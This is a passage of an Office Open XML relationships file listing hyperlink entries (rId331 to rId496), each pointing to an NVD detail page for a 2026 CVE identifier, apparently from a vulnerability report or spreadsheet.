Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69510" TargetMode="External" Id="rId331" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69524" TargetMode="External" Id="rId332" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69530" TargetMode="External" Id="rId333" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69546" TargetMode="External" Id="rId334" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69620" TargetMode="External" Id="rId335" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69680" TargetMode="External" Id="rId336" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69732" TargetMode="External" Id="rId337" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69782" TargetMode="External" Id="rId338" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69786" TargetMode="External" Id="rId339" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69813" TargetMode="External" Id="rId340" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69827" TargetMode="External" Id="rId341" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69858" TargetMode="External" Id="rId342" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69989" TargetMode="External" Id="rId343" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70342" TargetMode="External" Id="rId344" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70563" TargetMode="External" Id="rId345" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72936" TargetMode="External" Id="rId346" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72981" TargetMode="External" Id="rId347" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72987" TargetMode="External" Id="rId348" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73313" TargetMode="External" Id="rId349" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75021" TargetMode="External" Id="rId350" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77505" TargetMode="External" Id="rId351" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78444" TargetMode="External" Id="rId352" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78449" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78450" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78626" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82066" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83527" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83997" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84393" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86720" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86723" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28662" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55277" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68827" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68834" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68838" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68876" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68878" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68880" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68894" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69271" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69301" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69322" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69332" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69346" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69365" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69371" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69412" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69418" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69423" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69427" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69458" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69462" TargetMode="External" Id="rId383" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69481" TargetMode="External" Id="rId384" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69503" TargetMode="External" Id="rId385" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69505" TargetMode="External" Id="rId386" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69512" TargetMode="External" Id="rId387" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69619" TargetMode="External" Id="rId388" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69623" TargetMode="External" Id="rId389" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69625" TargetMode="External" Id="rId390" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69643" TargetMode="External" Id="rId391" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69681" TargetMode="External" Id="rId392" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69689" TargetMode="External" Id="rId393" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69714" TargetMode="External" Id="rId394" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69717" TargetMode="External" Id="rId395" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69727" TargetMode="External" Id="rId396" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69762" TargetMode="External" Id="rId397" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69773" TargetMode="External" Id="rId398" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69777" TargetMode="External" Id="rId399" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69807" TargetMode="External" Id="rId400" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId401" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId402" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId403" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId404" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId405" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId406" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId407" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId408" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId409" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId410" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId411" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId412" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId413" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId414" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId415" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId416" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId417" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId418" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId419" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId420" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId421" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId422" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId423" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId424" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId425" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId426" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId427" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId428" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId429" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId430" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId431" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId432" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId433" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId434" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28659" TargetMode="External" Id="rId435" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId436" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId437" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId438" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId439" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId440" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId441" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId442" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId443" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId444" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId445" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId446" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId447" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId448" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId449" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId450" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId451" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId452" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId453" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId454" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId455" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId456" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId457" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId458" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId459" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId460" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId461" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId462" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId463" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId464" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId465" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId466" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId467" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId468" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId469" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId470" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId471" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId472" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId473" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId474" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId475" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId476" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId477" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId478" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId479" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId480" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId481" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId482" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId483" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId484" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId485" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId486" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId487" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId488" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId489" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId490" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId491" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId492" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId493" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId494" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId495" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId496" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 